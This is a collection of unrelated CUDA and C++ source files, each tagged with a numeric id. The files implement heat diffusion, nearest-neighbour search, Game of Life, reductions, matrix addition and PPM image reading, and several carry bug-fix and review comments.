    playground[index(0,i,N)] = 80;
  for(i = 0; i < N; i++)
    playground[index(i,0,N)] = 80;
  for(i = 0; i < N; i++)
    playground[index(i,N-1, N)] = 80;
  for(i = 0; i < N; i++)
    playground[index(N-1,i,N)] = 80;
  // rows (10,0) through (30,0) inclusive are 150F
  for(i = 10; i <= 30; i++)
    playground[index(i,0,N)] = 150;
  if( !type_of_device ) // The CPU sequential version
  {
    start = clock();
    seq_heat_dist(playground, N, iterations);
    end = clock();
  }
  else  // The GPU version
  {
    start = clock();
    gpu_heat_dist(playground, N, iterations);
    end = clock();
  }
  time_taken = ((double)(end - start))/ CLOCKS_PER_SEC;
  printf("Time taken for %s is %lf\n", type_of_device == 0? "CPU" : "GPU", time_taken);
  free(playground);
  return 0;
}

/***************** The CPU sequential version (DO NOT CHANGE THAT) **************/
void seq_heat_dist(float * playground, unsigned int N, unsigned int iterations)
{
  // Loop indices
  int i, j, k;
  int upper = N-1;
  // number of bytes to be copied between array temp and array playground
  unsigned int num_bytes = 0;
  float * temp;
  /* Dynamically allocate another array for temp values */
  /* Dynamically allocate NxN array of floats */
  temp = (float *)calloc(N*N, sizeof(float));
  if( !temp )
  {
    fprintf(stderr, " Cannot allocate temp %u x %u array\n", N, N);
    exit(1);
  }
  num_bytes = N*N*sizeof(float);
  /* Copy initial array in temp */
  memcpy((void *)temp, (void *) playground, num_bytes);
  for( k = 0; k < iterations; k++)
  {
    /* Calculate new values and store them in temp */
    for(i = 1; i < upper; i++)
      for(j = 1; j < upper; j++)
        temp[index(i,j,N)] = (playground[index(i-1,j,N)] +
                              playground[index(i+1,j,N)] +
                              playground[index(i,j-1,N)] +
                              playground[index(i,j+1,N)])/4.0;
    /* Move new values into old values */
    memcpy((void *)playground, (void *) temp, num_bytes);
  }
}

/***************** The GPU version: Write your code here *********************/

// One Jacobi relaxation step: each interior thread averages its four
// neighbours from d_playground into d_temp. Border cells are untouched.
__global__ void compute_heat(float * d_temp, float * d_playground, unsigned int N)
{
  int row = blockIdx.y * blockDim.y + threadIdx.y;
  int col = blockIdx.x * blockDim.x + threadIdx.x;
  if (row > 0 && row < N-1 && col > 0 && col < N-1) {
    d_temp[index(row,col,N)] = (d_playground[index(row-1,col,N)] +
                                d_playground[index(row+1,col,N)] +
                                d_playground[index(row,col-1,N)] +
                                d_playground[index(row,col+1,N)])/4.0;
  }
}

/* This function can call one or more kenels *********************************/
void gpu_heat_dist(float * playground, unsigned int N, unsigned int iterations)
{
  int k;
  //number of bytes to be copied between array temp and array playground
  unsigned int num_bytes = N*N*sizeof(float);
  //allocate memory to device
  float * d_temp;
  float * d_playground;
  cudaMalloc((void **)&d_temp, num_bytes);
  cudaMalloc((void **)&d_playground, num_bytes);
  //copy array from host to device
  cudaMemcpy(d_playground, playground, num_bytes, cudaMemcpyHostToDevice);
  cudaMemcpy(d_temp, d_playground, num_bytes, cudaMemcpyDeviceToDevice); //data locality
  //divide problem into 2d blocks in 2d grid
  dim3 blockDim(10, 10);
  // Bug fix: ceil(N/10) truncated in integer arithmetic *before* ceil() ran,
  // so for N not divisible by 10 the grid was too small and the last rows and
  // columns were never updated. Use integer ceiling division instead.
  dim3 gridDim((N + blockDim.x - 1) / blockDim.x,
               (N + blockDim.y - 1) / blockDim.y);
  //calulations performed in device
  for(k=0; k < iterations; k++)
  {
    compute_heat<<<gridDim, blockDim>>>(d_temp, d_playground, N);
    //copy results in device from temp to playground
    cudaMemcpy(d_playground, d_temp, num_bytes, cudaMemcpyDeviceToDevice);
  }
  //copy array from device to host
  cudaMemcpy(playground, d_temp, num_bytes, cudaMemcpyDeviceToHost);
  cudaFree(d_playground);
  cudaFree(d_temp);
}
21,421
#include "includes.h"

// For each of the n points of each of the b batches, find up to 4 nearest
// neighbours (within `radius`) in each of the 8 spatial octants around the
// point, writing 8 * 4 = 32 neighbour indices per point into idx_out.
// Layout: xyz is (b, n, 3); idx_out is (b, n, 32). One CUDA block per batch
// (blockIdx.x), threads stride over the points.
__global__ void cube_select_four(int b, int n,float radius, const float* xyz, int* idx_out) {
    int batch_idx = blockIdx.x;
    // Rebase the pointers onto this batch's slice.
    xyz += batch_idx * n * 3;
    idx_out += batch_idx * n * 32;
    // Per-thread candidate distances: 8 octants x 4 slots, kept sorted
    // ascending within each octant's 4-slot group.
    float temp_dist[32];
    float judge_dist = radius * radius;  // compare squared distances, no sqrt
    for(int i = threadIdx.x; i < n;i += blockDim.x) {
        float x = xyz[i * 3];
        float y = xyz[i * 3 + 1];
        float z = xyz[i * 3 + 2];
        // Initialise every slot to the cut-off and to the point itself.
        for(int j = 0;j < 32;j ++) {
            temp_dist[j] = judge_dist;
            idx_out[i * 32 + j] = i; // if not found, just return itself..
        }
        // Brute-force scan over all other points of the batch.
        for(int j = 0;j < n;j ++) {
            if(i == j) continue;
            float tx = xyz[j * 3];
            float ty = xyz[j * 3 + 1];
            float tz = xyz[j * 3 + 2];
            float dist = (x - tx) * (x - tx) + (y - ty) * (y - ty) + (z - tz) * (z - tz);
            if(dist > judge_dist) continue;
            // Octant of the candidate relative to point i, encoded as the
            // base offset of its 4-slot group (0, 4, 8, ..., 28).
            int _x = (tx > x);
            int _y = (ty > y);
            int _z = (tz > z);
            int temp_idx = _x * 16 + _y * 8 + _z * 4;
            bool flag = false;
            // Insertion into the sorted 4-slot group: find the first slot the
            // candidate beats, shift the worse entries down, insert, stop.
            for(int k = 0;k < 4;k ++) {
                if (dist < temp_dist[temp_idx + k]) {
                    flag = true;
                }
                if (flag) {
                    for (int kk = 3; kk >= k + 1; kk --) {
                        idx_out[i * 32 + temp_idx + kk] = idx_out[i * 32 + temp_idx + kk - 1];
                        temp_dist[temp_idx + kk] = temp_dist[temp_idx + kk - 1];
                    }
                    idx_out[i * 32 + temp_idx + k] = j;
                    temp_dist[temp_idx + k] = dist;
                    break;
                }
            }
        }
    }
}
21,422
#include <iostream>
#include <vector>
using namespace std;

// Round-trip a host vector through device memory with async copies on an
// explicit stream, then print what came back.
int main()
{
    cerr << "Starting" << endl;
    int NUM = 100;
    vector<float> h_vec1(NUM);
    vector<float> h_vec2(NUM);
    for (size_t i = 0; i < NUM; ++i) {
        h_vec1[i] = i * 3;
    }
    // Bug fix: the buffer holds floats, so type the device pointer as float*
    // (it was int*; the byte count happened to match, but the type lied).
    float *d_vec;
    cudaMalloc(&d_vec, NUM * sizeof(float));
    // copy
    //cudaMemcpy(d_vec, h_vec1.data(), NUM * sizeof(float), cudaMemcpyHostToDevice);
    //cudaMemcpy(h_vec2.data(), d_vec, NUM * sizeof(float), cudaMemcpyDeviceToHost);
    cudaStream_t stream;
    cudaStreamCreate(&stream);
    cudaMemcpyAsync(d_vec, h_vec1.data(), NUM * sizeof(float), cudaMemcpyHostToDevice, stream);
    cudaMemcpyAsync(h_vec2.data(), d_vec, NUM * sizeof(float), cudaMemcpyDeviceToHost, stream);
    // Bug fix: async copies are only *enqueued*; the host must wait for the
    // stream before reading h_vec2, otherwise it prints stale zeros/garbage.
    cudaStreamSynchronize(stream);
    cerr << "h_vec2=";
    for (size_t i = 0; i < NUM; ++i) {
        cerr << h_vec2[i] << " ";
    }
    cerr << endl;
    cudaStreamDestroy(stream);
    cerr << "Finished" << endl;
}
21,423
#include <iostream>
#include <math.h>
using namespace std;
#define W 500
#define H 500
#define TPB 32

// Clamp an int into the displayable [0, 255] range.
__device__ unsigned char clip(int n)
{
    // Bug fix: values above 255 must saturate to 255; the original returned
    // n itself, which wraps modulo 256 when truncated to unsigned char.
    if (n > 255) return 255;
    else if (n < 0) return 0;
    else return n;
}

__device__ int square(int x)
{
    return (x*x);
}

// Per-pixel kernel: intensity falls off with distance from `pos`,
// written as an opaque yellow gradient into dout (w x h image).
__global__ void distKernel(uchar4 *dout, int w, int h, int2 pos)
{
    const int c = blockIdx.x*blockDim.x + threadIdx.x;
    const int r = blockIdx.y*blockDim.y + threadIdx.y;
    const int i = r*w + c;
    if ((c >= w) || (r >= h)) return;
    int d = sqrtf(square(c-pos.x) + square(r-pos.y));
    unsigned char intensity = clip(255-d);
    dout[i].x = intensity; // red
    dout[i].y = intensity; // green
    dout[i].z = 0;         // blue
    dout[i].w = 255;       // opaque
}

int main()
{
    uchar4 *out = new uchar4[W*H];
    // Bug fix: `new uchar4` here leaked one host object — cudaMalloc
    // immediately overwrote the pointer. Just declare the device pointer.
    uchar4 *dout = 0;
    const int size = W*H*sizeof(uchar4);
    cudaMalloc(&dout, size);
    const int2 pos = {0, 0};
    const dim3 tpb(TPB, TPB);
    const dim3 bpg((W+TPB-1)/TPB, (H+TPB-1)/TPB);  // ceil-div grid
    distKernel<<<bpg,tpb>>>(dout, W, H, pos);
    cudaMemcpy(out, dout, size, cudaMemcpyDeviceToHost);
    cudaFree(dout);
    delete [] out;
}
21,424
#include<bits/stdc++.h>
using namespace std;
#define pi (2.0*acos(0.0))
#define eps 1e-6
#define ll long long
#define inf (1<<29)
#define vi vector<int>
#define vll vector<ll>
#define sc(x) scanf("%d",&x)
#define scl(x) scanf("%lld",&x)
#define all(v) v.begin() , v.end()
#define me(a,val) memset( a , val ,sizeof(a) )
#define pb(x) push_back(x)
#define pii pair<int,int>
#define mp(a,b) make_pair(a,b)
#define Q(x) (x) * (x)
#define L(x) ((x<<1) + 1)
#define R(x) ((x<<1) + 2)
#define M(x,y) ((x+y)>>1)
#define fi first
#define se second
#define MOD 1000000007
#define ios ios::sync_with_stdio(0)
#define N 64
#define TB 32

float A[N][N];
float B[N][N];
float C[N][N];

// Element-wise matrix add: C = A + B, one thread per element.
__global__ void MatAdd(float A[N][N], float B[N][N], float C[N][N])
{
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    int j = blockIdx.y * blockDim.y + threadIdx.y;
    if (i < N && j < N)
        C[i][j] = A[i][j] + B[i][j];
}

int main(){
    float (*d_A)[N]; //pointers to arrays of dimension N
    float (*d_B)[N];
    float (*d_C)[N];
    for(int i = 0; i < N; i++) {
        for(int j = 0; j < N; j++) {
            A[i][j] = i;
            B[i][j] = j;
        }
    }
    //allocation
    cudaMalloc((void**)&d_A, (N*N)*sizeof(float));
    cudaMalloc((void**)&d_B, (N*N)*sizeof(float));
    cudaMalloc((void**)&d_C, (N*N)*sizeof(float));
    //copying from host to device
    cudaMemcpy(d_A, A, (N*N)*sizeof(float), cudaMemcpyHostToDevice);
    cudaMemcpy(d_B, B, (N*N)*sizeof(float), cudaMemcpyHostToDevice);
    cudaMemcpy(d_C, C, (N*N)*sizeof(float), cudaMemcpyHostToDevice);
    // Kernel invocation
    dim3 threadsPerBlock(16, 16);
    dim3 numBlocks(N / threadsPerBlock.x, N / threadsPerBlock.y);
    MatAdd<<<numBlocks, threadsPerBlock>>>(d_A, d_B, d_C);
    //copying from device to host
    cudaMemcpy(A, (d_A), (N*N)*sizeof(float), cudaMemcpyDeviceToHost);
    cudaMemcpy(B, (d_B), (N*N)*sizeof(float), cudaMemcpyDeviceToHost);
    cudaMemcpy(C, (d_C), (N*N)*sizeof(float), cudaMemcpyDeviceToHost);
    for(int i = 0; i < N; i++){
        for(int j = 0; j < N; j++)
            printf("%lf ", C[i][j]);
        printf("\n");
    }
    // Release device memory (was leaked).
    cudaFree(d_A);
    cudaFree(d_B);
    cudaFree(d_C);
    return 0;
}
21,425
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <math.h>
//Dimension of problem grid
#define NPROB 240
#define GENERATION 100000
//Size of threads should be multiple of warp's size(32)
#define THREAD_NUMBER 64

//Standard inidat: fill the grid with random alive/dead cells.
void inidat(int nx, bool *u)
{
    int ix, iy;
    for (ix = 0; ix <= nx - 1; ix++) {
        for (iy = 0; iy <= nx - 1; iy++) {
            u[ix*NPROB+iy] = rand() % 2;
        }
    }
}

//Standard prtdat: write the grid as space-separated 0/1 rows.
void prtdat(int nx, bool* u, char *fnam)
{
    int ix, iy;
    FILE *fp;
    fp = fopen(fnam, "w");
    for (ix = 0; ix < nx; ix++) {
        for (iy = 0; iy < nx; iy++) {
            fprintf(fp, "%d", u[ix*NPROB+iy]);
            if (iy != nx - 1) {
                fprintf(fp, " ");
            } else {
                fprintf(fp, "\n");
            }
        }
    }
    fclose(fp);
}

// One Game-of-Life generation: B = next(A), toroidal wrap-around borders.
// One thread per cell, flat 1-D launch.
__global__ void Update(bool *A, bool* B)
{
    //Take Indexes
    int i, j, temp, sum, down, up, left, right;
    temp = blockIdx.x * blockDim.x + threadIdx.x;
    i = temp / NPROB;
    j = temp % NPROB;
    //Check for errors and values of edges
    if (i < 0 || i > NPROB - 1 || j < 0 || j > NPROB - 1) {
        return;
    }
    // Wrap-around neighbour coordinates (torus topology).
    down = (i != NPROB-1) ? i+1 : 0;
    up = (i != 0) ? i-1 : NPROB-1;
    left = (j != 0) ? j-1 : NPROB-1;
    right = (j != NPROB-1) ? j+1 : 0;
    sum = A[down*NPROB+j] + A[up*NPROB+j] + A[i*NPROB+left] + A[i*NPROB+right]
        + A[down*NPROB+left] + A[up*NPROB+left] + A[down*NPROB+right] + A[up*NPROB+right];
    //Calculate formula
    B[i*NPROB+j] = ((sum == 3) || (A[i*NPROB+j] == true && sum == 2));
    // Bug fix: the trailing __syncthreads() was removed — out-of-range
    // threads return early, so the barrier was divergent (undefined
    // behaviour), and no thread reads another thread's output anyway.
}

int main(int argc, char *argv[])
{
    bool *d_A, *d_B, *h_A;
    int it;
    //Creating two 1d arrays for cuda
    cudaMalloc((void**)&d_A, (unsigned long)(NPROB*NPROB*sizeof(bool)));
    cudaMalloc((void**)&d_B, (unsigned long)(NPROB*NPROB*sizeof(bool)));
    //Creating h_A to initialiaze
    h_A = (bool*)malloc(NPROB*NPROB*sizeof(bool));
    memset(h_A, 0, NPROB*NPROB*sizeof(bool));
    //Transfering the h_A to device
    printf("Grid size: %d Generations: %d\n", NPROB, GENERATION);
    printf("Initializing grid and writing in initial.dat \n");
    inidat(NPROB, h_A);
    prtdat(NPROB, h_A, "initial.dat");
    cudaMemcpy(d_B, h_A, NPROB*NPROB*sizeof(bool), cudaMemcpyHostToDevice);
    cudaMemcpy(d_A, h_A, NPROB*NPROB*sizeof(bool), cudaMemcpyHostToDevice);
    bool* handler;
    struct timeval tv1, tv2;
    gettimeofday(&tv1, NULL);
    for (it = 1; it <= GENERATION; it++) {
        //Swapping between the two arrays
        Update<<<NPROB*NPROB/THREAD_NUMBER+1, THREAD_NUMBER>>>(d_A, d_B);
        // cudaThreadSynchronize() is deprecated; use the runtime-API form.
        cudaDeviceSynchronize();
        handler = d_A;
        d_A = d_B;
        d_B = handler;
    }
    gettimeofday(&tv2, NULL);
    printf("Finished after %f seconds\n",
           (double) (tv2.tv_usec - tv1.tv_usec) / 1000000 + (double) (tv2.tv_sec - tv1.tv_sec));
    printf("Writing final.dat file \n");
    //Copy results back to host memory
    cudaMemcpy(h_A, d_A, NPROB*NPROB*sizeof(bool), cudaMemcpyDeviceToHost);
    //Print Results
    prtdat(NPROB, h_A, "final.dat");
    cudaFree(d_A);
    cudaFree(d_B);
    free(h_A);
}
21,426
#include "cuda_includes.cuh"
#include <stdlib.h>
#include <stdio.h>

// Print a diagnostic and abort the process when a CUDA API call failed;
// no-op for cudaSuccess. Intended to be wrapped by a macro passing
// __FILE__/__LINE__.
void HandleError(cudaError_t err, const char* file, int line)
{
    if (err == cudaSuccess)
        return;
    printf("%s in %s at line %d\n", cudaGetErrorString(err), file, line);
    exit(EXIT_FAILURE);
}

// Forward declaration; the definition lives elsewhere.
struct Sphere;
21,427
// Device code
// In-place scalar multiply: A[i] *= scalar for the first N elements.
// One thread per element; threads beyond N exit immediately.
extern "C" __global__ void scale(float* A, float scalar, int N)
{
    const int idx = blockDim.x * blockIdx.x + threadIdx.x;
    if (idx >= N)
        return;
    A[idx] *= scalar;
}
21,428
#include "includes.h"

// Grid-stride kernel: result[i] = |input[i]| * scale, optionally blended
// with the existing output as + beta * result[i] when beta != 0.
// The beta test is hoisted out of the loop so each path stays branch-free.
__global__ void cudaSScaleAbs_kernel(unsigned int size, float* input, const float scale, const float beta, float* result)
{
    const unsigned int index = blockIdx.x * blockDim.x + threadIdx.x;
    const unsigned int stride = blockDim.x * gridDim.x;
    if (beta != 0.0f) {
        for (unsigned int i = index; i < size; i += stride)
            // fabsf (not fabs): keeps the computation in single precision
            // instead of a float->double->float round trip.
            result[i] = fabsf(input[i]) * scale + beta * result[i];
    }
    else {
        for (unsigned int i = index; i < size; i += stride)
            result[i] = fabsf(input[i]) * scale;
    }
}
21,429
#include "includes.h"

// Gather float3 particle data into sorted order: particles below pini keep
// their slot, the rest are fetched from the position given by sortpart[p].
__global__ void KerSortDataParticles(unsigned n,unsigned pini,const unsigned *sortpart,const float3 *a,float3 *a2)
{
    const unsigned p=blockIdx.x*blockDim.x + threadIdx.x; //-Particle number.
    if(p>=n)
        return;
    unsigned oldpos=p;
    if(p>=pini)
        oldpos=sortpart[p];  // remapped source slot
    a2[p]=a[oldpos];
}
21,430
#include "includes.h"

// Wherever mask[i] equals mask_num, overwrite x[i] with val.
// Flattened index supports a 2-D grid of 1-D blocks; extra threads exit.
__global__ void mask_kernel(int n, float *x, float mask_num, float *mask, float val)
{
    const int idx = (blockIdx.y * gridDim.x + blockIdx.x) * blockDim.x + threadIdx.x;
    if (idx >= n)
        return;
    if (mask[idx] == mask_num)
        x[idx] = val;
}
21,431
#include <iostream>
#include <iomanip>

// Grid-stride kernel: replace every element of `vector` with its absolute value.
__global__ void KernelVectorAbs(double *vector, int size){
    int i = threadIdx.x + blockIdx.x * blockDim.x;
    int offset = gridDim.x * blockDim.x;
    while (i < size) {
        vector[i] = (vector[i] < 0) ? -vector[i] : vector[i];
        i += offset;
    }
}

// Read launch config and data from stdin, run the kernel, print the result
// in scientific notation.
int main(){
    std::ios_base::sync_with_stdio(false);
    int size, blocks, threds;
    std::cin >> blocks >> threds >> size;
    double *vector = new double[size], *result = new double[size], *cudaVecor;
    for (int i = 0; i < size; ++i)
        std::cin >> vector[i];
    cudaMalloc((void **) &cudaVecor, sizeof(double) * size);
    cudaMemcpy(cudaVecor, vector, sizeof(double) * size, cudaMemcpyHostToDevice);
    KernelVectorAbs<<<blocks, threds>>>(cudaVecor, size);
    // Bug fix: the launch-error status was fetched and thrown away; report it.
    cudaError_t err = cudaGetLastError();
    if (err != cudaSuccess)
        std::cerr << "CUDA error: " << cudaGetErrorString(err) << '\n';
    cudaMemcpy(result, cudaVecor, sizeof(double) * size, cudaMemcpyDeviceToHost);
    std::cout.setf(std::ios::scientific);
    std::cout.precision(10);
    for (int i = 0; i < size; ++i)
        std::cout << result[i] << ' ';
    std::cout << '\n';
    cudaFree(cudaVecor);
    delete[] vector;
    delete[] result;   // was leaked
}
21,432
#include "includes.h"

// Leaky-rectifier forward pass (grid-stride). Each input is optionally
// rescaled by a power-of-two shift, then y = value for positive inputs
// (clamped to `clipping` when clipping > 0) and y = leakSlope * value
// for non-positive inputs.
__global__ void cudaDRectifier_propagate_kernel(double* x, double* y, unsigned int size, double leakSlope, int shifting, double clipping)
{
    const unsigned int first = blockIdx.x * blockDim.x + threadIdx.x;
    const unsigned int step = blockDim.x * gridDim.x;
    for (unsigned int i = first; i < size; i += step) {
        double value = x[i];
        // Fixed-point style shift: divide for positive shifts, multiply
        // for negative ones.
        if (shifting > 0)
            value /= (1 << shifting);
        else if (shifting < 0)
            value *= (1 << (-shifting));
        double positivePart = value;
        if (clipping > 0.0)
            positivePart = min(value, clipping);
        y[i] = (value > 0.0) ? positivePart : leakSlope * value;
    }
}
21,433
#include "includes.h"

// Sum `sequenceLength` consecutive memory blocks (each `count` floats, laid
// out back to back) element-wise into the first block. One thread per
// element; supports a 2-D grid of 1-D blocks.
__global__ void CumulateThroughTimeKernel(float* memoryBlocks, int count, int sequenceLength)
{
    const int memoryIdx = blockDim.x * blockIdx.y * gridDim.x
                        + blockDim.x * blockIdx.x + threadIdx.x;
    if (memoryIdx >= count)
        return;
    // Accumulate left-to-right (same order as the original in-place loop).
    float total = memoryBlocks[memoryIdx];
    for (size_t step = 1; step < sequenceLength; step++)
        total += memoryBlocks[step * count + memoryIdx];
    memoryBlocks[memoryIdx] = total;
}
21,434
/*
 *
 * atomic32.cu
 *
 * Microdemo for atomic operations on 32-bit integers in global memory.
 *
 * NOT INTENDED AS A SAMPLE FOR ANYTHING OTHER THAN CODE GENERATION.
 *
 * Build with:
 *     nvcc --gpu-architecture sm_xx --cubin atomic32.cu
 *     cuobjdump --dump-sass atomic32.cubin
 * (fill in xx with 11, 20, or 30 to examine code generation of Tesla,
 * Fermi and Kepler, respectively)
 *
 * Copyright (c) 2011-2012, Archaea Software, LLC.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 *
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in
 *    the documentation and/or other materials provided with the
 *    distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
 * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
 * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
 * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
 * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 */

// Atomically accumulate *pIn into out[threadIdx.x]; the fetched old value
// is discarded, so the compiler may emit the non-returning atomic form.
__global__ void AddTo32( int *sum, int *out, const int *pIn )
{
    atomicAdd( &out[threadIdx.x], *pIn );
}

// Atomically accumulate *pIn into sum[threadIdx.x] and record the value
// that was there before the add.
__global__ void Return32( int *sum, int *out, const int *pIn )
{
    const int previous = atomicAdd( &sum[threadIdx.x], *pIn );
    out[threadIdx.x] = previous;
}
21,435
#include "includes.h"

// Block-level sum reduction with interleaved (stride-halving) addressing:
// each block reduces its blockDim.x-element slice of g_idata in place and
// writes the partial sum to g_odata[blockIdx.x]. g_idata is destroyed.
// NOTE(review): the early `return` below exits out-of-range threads before
// the __syncthreads() inside the loop, so this kernel is only well-defined
// when n is an exact multiple of blockDim.x (every thread of every block
// in range) — confirm the launch configuration guarantees that.
__global__ void reduceInterleaved (int *g_idata, int *g_odata, unsigned int n)
{
    // set thread ID
    unsigned int tid = threadIdx.x;
    unsigned int idx = blockIdx.x * blockDim.x + threadIdx.x;
    // boundary check
    if(idx >= n) return;
    // in-place reduction in global memory
    // Each pass folds the upper half of the active range onto the lower half.
    for (int stride = blockDim.x / 2; stride > 0; stride /= 2)
    {
        if (tid < stride)
        {
            g_idata[idx] += g_idata[idx + stride];
        }
        // Barrier before the next pass reads what this pass wrote.
        __syncthreads();
    }
    // write result for this block to global mem
    if (tid == 0) g_odata[blockIdx.x] = g_idata[idx];
}
21,436
#include <iostream>
#include <stdlib.h>
#include <string.h>

// Abort-on-error wrapper for CUDA API calls.
#define gpuErrchk(ans) { gpuAssert((ans), __FILE__, __LINE__); }
inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true)
{
    if (code != cudaSuccess)
    {
        fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line);
        if (abort) exit(code);
    }
}

using namespace std;

// Single-block shared-memory sum of the first n ints of DA into *Das,
// using a doubling-offset (Hillis–Steele style) sweep: after the loop
// SA[0] holds the total.
// NOTE(review): SA is sized by the launch's dynamic shared-memory argument
// (256 ints in main below); for n > blockDim.x only the first blockDim.x
// elements are loaded, and SA[i+offset] can read past the allocation —
// confirm n <= blockDim.x before use.
__global__ void vectorSumWithinBlock(int * DA, int n, int* Das){
    extern __shared__ int SA[];
    int i = threadIdx.x;
    if(i < n){ SA[i] = DA[i]; }
    __syncthreads();
    for(int offset = 1; offset < n; ){
        if(i < n && i+offset < n){ SA[i]+=SA[i+offset]; }
        __syncthreads();
        offset*=2;
    }
    // All threads store the same SA[0] — a benign same-value write race.
    *Das = SA[0];
}

// Same reduction with the tree fully unrolled for blockDim.x == 256,
// halving the active range at each step with a barrier between steps.
__global__ void vectorSumWithinBlock2(int* DA, int n, int* Das){
    extern __shared__ int SA[];
    int i = threadIdx.x;
    if(i < n){ SA[i] = DA[i]; }
    __syncthreads();
    if(i < 128 && i+128<n){ SA[i] += SA[i+128]; }
    __syncthreads();
    if(i < 64 && i+64<n){ SA[i] += SA[i+64]; }
    __syncthreads();
    if(i < 32 && i+32<n){ SA[i] += SA[i+32]; }
    __syncthreads();
    if(i < 16 && i+16<n){ SA[i] += SA[i+16]; }
    __syncthreads();
    if(i < 8 && i+8<n){ SA[i] += SA[i+8]; }
    __syncthreads();
    if(i < 4 && i+4<n){ SA[i] += SA[i+4]; }
    __syncthreads();
    if(i < 2 && i+2<n){ SA[i] += SA[i+2]; }
    __syncthreads();
    if(i < 1 && i+1<n){ SA[i] += SA[i+1]; }
    __syncthreads();
    *Das = SA[0];
}

// need to ensure n is larger than 32
// Variant that drops the barriers for the last 32-wide stage, relying on
// implicit warp-synchronous execution.
// NOTE(review): without `volatile` on SA or __syncwarp() between the six
// adds, this pattern is not safe on Volta+ independent thread scheduling —
// the compiler/scheduler may reorder the shared loads. Flagged for review.
__global__ void vectorSumWithinBlock3(int* DA, int n, int* Das){
    extern __shared__ int SA[];
    int i = threadIdx.x;
    if(i < n){ SA[i] = DA[i]; }
    __syncthreads();
    if(i < 128 && i+128<n){ SA[i] += SA[i+128]; }
    __syncthreads();
    if(i < 64 && i+64<n){ SA[i] += SA[i+64]; }
    __syncthreads();
    if(i < 32 && i+32<n){
        SA[i] += SA[i+32];
        SA[i] += SA[i+16];
        SA[i] += SA[i+8];
        SA[i] += SA[i+4];
        SA[i] += SA[i+2];
        SA[i] += SA[i+1];
    }
    __syncthreads();
    *Das = SA[0];
}

// Driver: fill a host vector with -1 (memset of 0xFF bytes makes each int
// equal -1, so the expected sum is -n), run kernels 1 and 2 on a single
// 256-thread block, and print each result. vectorSumWithinBlock3 is
// compiled but never launched here.
int main(){
    int n;
    cout << "input the vector len" << endl;
    cin >> n;
    int vectorSizeInByte = sizeof(int)*n;
    int* HA;
    HA = (int*) malloc(vectorSizeInByte);
    memset(HA, -1, vectorSizeInByte);
    cout << "initialed the host array" << endl;
    int* DA;
    gpuErrchk(cudaMalloc((void**)&DA, vectorSizeInByte));
    gpuErrchk(cudaMemcpy(DA, HA, vectorSizeInByte, cudaMemcpyHostToDevice));
    cout << "coped the array to device" << endl;
    int* Das;
    gpuErrchk(cudaMalloc((void**)&Das, sizeof(int)));
    dim3 dimgrid(1);
    dim3 dimblock(256);
    int Has = -1;
    // https://developer.nvidia.com/blog/using-shared-memory-cuda-cc/ need to add the third arg because this kernel use dynamic shared memory
    vectorSumWithinBlock<<<dimgrid, dimblock, 256*sizeof(int)>>>(DA, n, Das);
    cout << "sum complted" << endl;
    cudaMemcpy(&Has, Das, sizeof(int), cudaMemcpyDeviceToHost);
    cudaDeviceSynchronize();
    cout << "coped the ans to host" << endl;
    cout << Has << endl;
    // https://developer.nvidia.com/blog/using-shared-memory-cuda-cc/ need to add the third arg because this kernel use dynamic shared memory
    vectorSumWithinBlock2<<<dimgrid, dimblock, 256*sizeof(int)>>>(DA, n, Das);
    cout << "sum complted" << endl;
    cudaMemcpy(&Has, Das, sizeof(int), cudaMemcpyDeviceToHost);
    cudaDeviceSynchronize();
    cout << "coped the ans to host" << endl;
    cout << Has << endl;
    return 0;
}
21,437
#include <cuda.h> #include <cmath> #include <cstdio> #include <cstdlib> #include <iostream> #include <chrono> #define RGB_COMPONENT_COLOR 255 #define BLUR_SIZE 5 using namespace std; typedef struct { unsigned char red, green, blue; } PPMPixel; typedef struct { int x, y; PPMPixel *data; } PPMImage; unsigned char *readPPM(const char *filename, int &x, int &y) { char buff[16]; unsigned char* imgchar; FILE *fp; int c, rgb_comp_color; //open PPM file for reading fp = fopen(filename, "rb"); if (!fp) { fprintf(stderr, "Unable to open file '%s'\n", filename); exit(1); } //read image format if (!fgets(buff, sizeof(buff), fp)) { perror(filename); exit(1); } //check the image format if (buff[0] != 'P' || buff[1] != '6') { fprintf(stderr, "Invalid image format (must be 'P6')\n"); exit(1); } //read image size information if (fscanf(fp, "%d %d", &x, &y) != 2) { fprintf(stderr, "Invalid image size (error loading '%s')\n", filename); exit(1); } //read rgb component if (fscanf(fp, "%d", &rgb_comp_color) != 1) { fprintf(stderr, "Invalid rgb component (error loading '%s')\n", filename); exit(1); } //check rgb component depth if (rgb_comp_color != RGB_COMPONENT_COLOR) { fprintf(stderr, "'%s' does not have 8-bits components\n", filename); exit(1); } while (fgetc(fp) != '\n'); //memory allocation for pixel data imgchar = (unsigned char*)malloc(3 * x*y * sizeof(char)); //read pixel data from file fread(imgchar, 3 * x, y, fp); fclose(fp); return imgchar; } void writePPM(unsigned char * img, int x, int y) { FILE *fp; //open file for output fp = fopen("C:\\UCSP\\2019-I\\AP\\Practice\\blur\\blur\\img_blur.ppm", "wb"); if (!fp) { fprintf(stderr, 